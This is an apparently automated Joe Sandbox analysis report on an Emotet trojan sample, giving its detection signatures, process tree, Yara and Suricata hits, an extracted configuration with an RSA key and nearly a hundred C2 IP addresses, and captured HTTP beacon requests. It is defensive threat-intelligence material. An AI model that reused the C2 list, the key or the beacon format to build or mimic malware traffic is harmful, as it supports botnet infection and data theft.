Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ExeFile (356).exe

Overview

General Information

Sample name:ExeFile (356).exe
Analysis ID:1495910
MD5:4c1c997c16309a2d391e1d39988000cc
SHA1:199ebff853acd5f3209ea81c75d48d1db20334cc
SHA256:c37ae465ddd63d49f36380cf223d1b0d3117021190d73bc37ee132ec10020342
Tags:EmotetHeodo
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Emotet
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ExeFile (356).exe (PID: 6640 cmdline: "C:\Users\user\Desktop\ExeFile (356).exe" MD5: 4C1C997C16309A2D391E1D39988000CC)
    • Websocket.exe (PID: 6716 cmdline: "C:\Windows\SysWOW64\provcore\Websocket.exe" MD5: 4C1C997C16309A2D391E1D39988000CC)
  • svchost.exe (PID: 6240 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["71.72.196.159:80", "134.209.36.254:8080", "120.138.30.150:8080", "94.23.216.33:80", "157.245.99.39:8080", "137.59.187.107:8080", "94.23.237.171:443", "61.19.246.238:443", "156.155.166.221:80", "50.35.17.13:80", "153.137.36.142:80", "91.211.88.52:7080", "209.141.54.221:8080", "185.94.252.104:443", "174.45.13.118:80", "87.106.136.232:8080", "62.75.141.82:80", "213.196.135.145:80", "188.219.31.12:80", "82.80.155.43:80", "187.161.206.24:80", "172.91.208.86:80", "124.41.215.226:80", "107.5.122.110:80", "200.123.150.89:443", "95.179.229.244:8080", "83.169.36.251:8080", "1.221.254.82:80", "95.213.236.64:8080", "181.169.34.190:80", "47.144.21.12:443", "203.153.216.189:7080", "89.216.122.92:80", "84.39.182.7:80", "94.200.114.161:80", "104.236.246.93:8080", "139.99.158.11:443", "176.111.60.55:8080", "78.24.219.147:8080", "220.245.198.194:80", "62.30.7.67:443", "139.162.108.71:8080", "104.32.141.43:80", "153.232.188.106:80", "93.147.212.206:80", "79.137.83.50:443", "96.249.236.156:443", "24.43.99.75:80", "75.80.124.4:80", "42.200.107.142:80", "110.5.16.198:80", "5.196.74.210:8080", "110.145.77.103:80", "200.114.213.233:8080", "85.152.162.105:80", "5.39.91.110:7080", "109.74.5.95:8080", "140.186.212.146:80", "37.187.72.193:8080", "97.82.79.83:80", "139.130.242.43:80", "201.173.217.124:443", "123.176.25.234:80", "104.131.44.150:8080", "74.208.45.104:8080", "139.59.60.244:8080", "120.150.60.189:80", "74.219.172.26:80", "219.75.128.166:80", "82.225.49.121:80", "85.105.205.77:8080", "24.179.13.119:80", "74.120.55.163:80", "174.102.48.180:443", "219.74.18.66:443", "168.235.67.138:7080", "194.187.133.160:443", "78.187.156.31:80", "103.86.49.11:8080", "61.92.17.12:80", "24.137.76.62:80", "104.131.11.150:443", "79.98.24.39:8080", "75.139.38.211:80", "162.241.242.173:8080", "195.251.213.56:80", "37.139.21.175:8080", "46.105.131.79:8080", "50.91.114.38:80", "121.124.124.40:7080", "74.134.41.124:80", "68.188.112.97:80", "137.119.36.33:80", "121.7.127.163:80", "87.106.139.101:8080", "94.1.108.190:443", "169.239.182.217:8080"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_5528b3b0unknownunknown
    • 0x31dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
    00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_5528b3b0unknownunknown
      • 0x31dc:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
      00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.Websocket.exe.60279e.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          2.2.Websocket.exe.60279e.2.raw.unpackWindows_Trojan_Emotet_5528b3b0unknownunknown
          • 0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
          0.2.ExeFile (356).exe.5f279e.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            0.2.ExeFile (356).exe.5f279e.3.raw.unpackWindows_Trojan_Emotet_5528b3b0unknownunknown
            • 0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
            0.2.ExeFile (356).exe.5f279e.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 15 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Communication To Uncommon Destination Ports
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 134.209.36.254, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\provcore\Websocket.exe, Initiated: true, ProcessId: 6716, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49722
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6240, ProcessName: svchost.exe

              Suricata Signatures

              Timestamp:2024-08-20T17:47:30.327401+0200
              SID:2854388
              Severity:1
              Source Port:49723
              Destination Port:8080
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T17:48:48.814321+0200
              SID:2854388
              Severity:1
              Source Port:62418
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T17:47:03.074373+0200
              SID:2854388
              Severity:1
              Source Port:62404
              Destination Port:443
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T17:48:53.453903+0200
              SID:2854388
              Severity:1
              Source Port:62419
              Destination Port:8080
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T17:47:59.609413+0200
              SID:2854388
              Severity:1
              Source Port:49726
              Destination Port:8080
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: ExeFile (356).exeAvira: detected
              Found malware configuration
              Source: 2.2.Websocket.exe.610000.4.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["71.72.196.159:80", "134.209.36.254:8080", "120.138.30.150:8080", "94.23.216.33:80", "157.245.99.39:8080", "137.59.187.107:8080", "94.23.237.171:443", "61.19.246.238:443", "156.155.166.221:80", "50.35.17.13:80", "153.137.36.142:80", "91.211.88.52:7080", "209.141.54.221:8080", "185.94.252.104:443", "174.45.13.118:80", "87.106.136.232:8080", "62.75.141.82:80", "213.196.135.145:80", "188.219.31.12:80", "82.80.155.43:80", "187.161.206.24:80", "172.91.208.86:80", "124.41.215.226:80", "107.5.122.110:80", "200.123.150.89:443", "95.179.229.244:8080", "83.169.36.251:8080", "1.221.254.82:80", "95.213.236.64:8080", "181.169.34.190:80", "47.144.21.12:443", "203.153.216.189:7080", "89.216.122.92:80", "84.39.182.7:80", "94.200.114.161:80", "104.236.246.93:8080", "139.99.158.11:443", "176.111.60.55:8080", "78.24.219.147:8080", "220.245.198.194:80", "62.30.7.67:443", "139.162.108.71:8080", "104.32.141.43:80", "153.232.188.106:80", "93.147.212.206:80", "79.137.83.50:443", "96.249.236.156:443", "24.43.99.75:80", "75.80.124.4:80", "42.200.107.142:80", "110.5.16.198:80", "5.196.74.210:8080", "110.145.77.103:80", "200.114.213.233:8080", "85.152.162.105:80", "5.39.91.110:7080", "109.74.5.95:8080", "140.186.212.146:80", "37.187.72.193:8080", "97.82.79.83:80", "139.130.242.43:80", "201.173.217.124:443", "123.176.25.234:80", "104.131.44.150:8080", "74.208.45.104:8080", "139.59.60.244:8080", "120.150.60.189:80", "74.219.172.26:80", "219.75.128.166:80", "82.225.49.121:80", "85.105.205.77:8080", "24.179.13.119:80", "74.120.55.163:80", "174.102.48.180:443", "219.74.18.66:443", "168.235.67.138:7080", "194.187.133.160:443", "78.187.156.31:80", "103.86.49.11:8080", "61.92.17.12:80", "24.137.76.62:80", "104.131.11.150:443", "79.98.24.39:8080", "75.139.38.211:80", "162.241.242.173:8080", "195.251.213.56:80", "37.139.21.175:8080", "46.105.131.79:8080", "50.91.114.38:80", "121.124.124.40:7080", "74.134.41.124:80", "68.188.112.97:80", "137.119.36.33:80", "121.7.127.163:80", "87.106.139.101:8080", "94.1.108.190:443", "169.239.182.217:8080"]}
              Multi AV Scanner detection for submitted file
              Source: ExeFile (356).exeReversingLabs: Detection: 97%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Machine Learning detection for sample
              Source: ExeFile (356).exeJoe Sandbox ML: detected
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006125A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,2_2_006125A0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00612210 CryptDestroyHash,CryptExportKey,CryptDuplicateHash,CryptGetHashParam,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,2_2_00612210
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00611FA0 CryptDuplicateHash,CryptDestroyHash,memcpy,2_2_00611FA0
              Source: ExeFile (356).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: A:\WindowsProcessManager-master\WindowsProcessManager-master\Release\TaskMgr.pdb source: ExeFile (356).exe
              Source: Binary string: vfwwdm32.pdb source: ExeFile (356).exe
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_006038B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,0_2_006038B0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006138B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,2_2_006138B0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49723 -> 120.138.30.150:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49723 -> 120.138.30.150:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62418 -> 174.45.13.118:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62418 -> 174.45.13.118:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49726 -> 137.59.187.107:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49726 -> 137.59.187.107:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62419 -> 87.106.136.232:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62419 -> 87.106.136.232:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62408 -> 153.137.36.142:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62408 -> 153.137.36.142:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62405 -> 61.19.246.238:443
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49724 -> 94.23.216.33:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49724 -> 94.23.216.33:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62406 -> 156.155.166.221:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62409 -> 91.211.88.52:7080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62409 -> 91.211.88.52:7080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62407 -> 50.35.17.13:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62407 -> 50.35.17.13:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49712 -> 71.72.196.159:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49712 -> 71.72.196.159:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62420 -> 62.75.141.82:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62420 -> 62.75.141.82:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49725 -> 157.245.99.39:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49725 -> 157.245.99.39:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:49722 -> 134.209.36.254:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:49722 -> 134.209.36.254:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62410 -> 209.141.54.221:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62410 -> 209.141.54.221:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62411 -> 185.94.252.104:443
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62411 -> 185.94.252.104:443
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.12:62404 -> 94.23.237.171:443
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.12:62404 -> 94.23.237.171:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 71.72.196.159:80
              Source: Malware configuration extractorIPs: 134.209.36.254:8080
              Source: Malware configuration extractorIPs: 120.138.30.150:8080
              Source: Malware configuration extractorIPs: 94.23.216.33:80
              Source: Malware configuration extractorIPs: 157.245.99.39:8080
              Source: Malware configuration extractorIPs: 137.59.187.107:8080
              Source: Malware configuration extractorIPs: 94.23.237.171:443
              Source: Malware configuration extractorIPs: 61.19.246.238:443
              Source: Malware configuration extractorIPs: 156.155.166.221:80
              Source: Malware configuration extractorIPs: 50.35.17.13:80
              Source: Malware configuration extractorIPs: 153.137.36.142:80
              Source: Malware configuration extractorIPs: 91.211.88.52:7080
              Source: Malware configuration extractorIPs: 209.141.54.221:8080
              Source: Malware configuration extractorIPs: 185.94.252.104:443
              Source: Malware configuration extractorIPs: 174.45.13.118:80
              Source: Malware configuration extractorIPs: 87.106.136.232:8080
              Source: Malware configuration extractorIPs: 62.75.141.82:80
              Source: Malware configuration extractorIPs: 213.196.135.145:80
              Source: Malware configuration extractorIPs: 188.219.31.12:80
              Source: Malware configuration extractorIPs: 82.80.155.43:80
              Source: Malware configuration extractorIPs: 187.161.206.24:80
              Source: Malware configuration extractorIPs: 172.91.208.86:80
              Source: Malware configuration extractorIPs: 124.41.215.226:80
              Source: Malware configuration extractorIPs: 107.5.122.110:80
              Source: Malware configuration extractorIPs: 200.123.150.89:443
              Source: Malware configuration extractorIPs: 95.179.229.244:8080
              Source: Malware configuration extractorIPs: 83.169.36.251:8080
              Source: Malware configuration extractorIPs: 1.221.254.82:80
              Source: Malware configuration extractorIPs: 95.213.236.64:8080
              Source: Malware configuration extractorIPs: 181.169.34.190:80
              Source: Malware configuration extractorIPs: 47.144.21.12:443
              Source: Malware configuration extractorIPs: 203.153.216.189:7080
              Source: Malware configuration extractorIPs: 89.216.122.92:80
              Source: Malware configuration extractorIPs: 84.39.182.7:80
              Source: Malware configuration extractorIPs: 94.200.114.161:80
              Source: Malware configuration extractorIPs: 104.236.246.93:8080
              Source: Malware configuration extractorIPs: 139.99.158.11:443
              Source: Malware configuration extractorIPs: 176.111.60.55:8080
              Source: Malware configuration extractorIPs: 78.24.219.147:8080
              Source: Malware configuration extractorIPs: 220.245.198.194:80
              Source: Malware configuration extractorIPs: 62.30.7.67:443
              Source: Malware configuration extractorIPs: 139.162.108.71:8080
              Source: Malware configuration extractorIPs: 104.32.141.43:80
              Source: Malware configuration extractorIPs: 153.232.188.106:80
              Source: Malware configuration extractorIPs: 93.147.212.206:80
              Source: Malware configuration extractorIPs: 79.137.83.50:443
              Source: Malware configuration extractorIPs: 96.249.236.156:443
              Source: Malware configuration extractorIPs: 24.43.99.75:80
              Source: Malware configuration extractorIPs: 75.80.124.4:80
              Source: Malware configuration extractorIPs: 42.200.107.142:80
              Source: Malware configuration extractorIPs: 110.5.16.198:80
              Source: Malware configuration extractorIPs: 5.196.74.210:8080
              Source: Malware configuration extractorIPs: 110.145.77.103:80
              Source: Malware configuration extractorIPs: 200.114.213.233:8080
              Source: Malware configuration extractorIPs: 85.152.162.105:80
              Source: Malware configuration extractorIPs: 5.39.91.110:7080
              Source: Malware configuration extractorIPs: 109.74.5.95:8080
              Source: Malware configuration extractorIPs: 140.186.212.146:80
              Source: Malware configuration extractorIPs: 37.187.72.193:8080
              Source: Malware configuration extractorIPs: 97.82.79.83:80
              Source: Malware configuration extractorIPs: 139.130.242.43:80
              Source: Malware configuration extractorIPs: 201.173.217.124:443
              Source: Malware configuration extractorIPs: 123.176.25.234:80
              Source: Malware configuration extractorIPs: 104.131.44.150:8080
              Source: Malware configuration extractorIPs: 74.208.45.104:8080
              Source: Malware configuration extractorIPs: 139.59.60.244:8080
              Source: Malware configuration extractorIPs: 120.150.60.189:80
              Source: Malware configuration extractorIPs: 74.219.172.26:80
              Source: Malware configuration extractorIPs: 219.75.128.166:80
              Source: Malware configuration extractorIPs: 82.225.49.121:80
              Source: Malware configuration extractorIPs: 85.105.205.77:8080
              Source: Malware configuration extractorIPs: 24.179.13.119:80
              Source: Malware configuration extractorIPs: 74.120.55.163:80
              Source: Malware configuration extractorIPs: 174.102.48.180:443
              Source: Malware configuration extractorIPs: 219.74.18.66:443
              Source: Malware configuration extractorIPs: 168.235.67.138:7080
              Source: Malware configuration extractorIPs: 194.187.133.160:443
              Source: Malware configuration extractorIPs: 78.187.156.31:80
              Source: Malware configuration extractorIPs: 103.86.49.11:8080
              Source: Malware configuration extractorIPs: 61.92.17.12:80
              Source: Malware configuration extractorIPs: 24.137.76.62:80
              Source: Malware configuration extractorIPs: 104.131.11.150:443
              Source: Malware configuration extractorIPs: 79.98.24.39:8080
              Source: Malware configuration extractorIPs: 75.139.38.211:80
              Source: Malware configuration extractorIPs: 162.241.242.173:8080
              Source: Malware configuration extractorIPs: 195.251.213.56:80
              Source: Malware configuration extractorIPs: 37.139.21.175:8080
              Source: Malware configuration extractorIPs: 46.105.131.79:8080
              Source: Malware configuration extractorIPs: 50.91.114.38:80
              Source: Malware configuration extractorIPs: 121.124.124.40:7080
              Source: Malware configuration extractorIPs: 74.134.41.124:80
              Source: Malware configuration extractorIPs: 68.188.112.97:80
              Source: Malware configuration extractorIPs: 137.119.36.33:80
              Source: Malware configuration extractorIPs: 121.7.127.163:80
              Source: Malware configuration extractorIPs: 87.106.139.101:8080
              Source: Malware configuration extractorIPs: 94.1.108.190:443
              Source: Malware configuration extractorIPs: 169.239.182.217:8080
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 62409 -> 7080
              Source: unknownNetwork traffic detected: IP country count 32
              Source: global trafficTCP traffic: 192.168.2.12:49722 -> 134.209.36.254:8080
              Source: global trafficTCP traffic: 192.168.2.12:49723 -> 120.138.30.150:8080
              Source: global trafficTCP traffic: 192.168.2.12:49725 -> 157.245.99.39:8080
              Source: global trafficTCP traffic: 192.168.2.12:49726 -> 137.59.187.107:8080
              Source: global trafficTCP traffic: 192.168.2.12:62409 -> 91.211.88.52:7080
              Source: global trafficTCP traffic: 192.168.2.12:62410 -> 209.141.54.221:8080
              Source: global trafficTCP traffic: 192.168.2.12:62419 -> 87.106.136.232:8080
              Source: Joe Sandbox ViewIP Address: 94.200.114.161 94.200.114.161
              Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
              Source: Joe Sandbox ViewIP Address: 85.152.162.105 85.152.162.105
              Source: Joe Sandbox ViewASN Name: DU-AS1AE DU-AS1AE
              Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
              Source: Joe Sandbox ViewASN Name: TELECABLESpainES TELECABLESpainES
              Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
              Source: global trafficHTTP traffic detected: POST /U79iM382/IZ04Joc/eLC1daPUos8/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------cs4fTNfbtTQbHost: 71.72.196.159Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 134.209.36.254/T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------mk75J6XmW2R3bqHost: 134.209.36.254:8080Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /3c7L3qI9O7w/Rm0uJBYq9TtaH/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 120.138.30.150/3c7L3qI9O7w/Rm0uJBYq9TtaH/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------VnrwklFt5SvgEBvHost: 120.138.30.150:8080Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /4sERDG3EhH4jL/eJgQIlw4kZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------dNvw9ZmlFxNAzGF12Host: 94.23.216.33Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 157.245.99.39/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------0xXrF4Ymva2woSLWTDYnAiHost: 157.245.99.39:8080Content-Length: 4660Cache-Control: no-cache
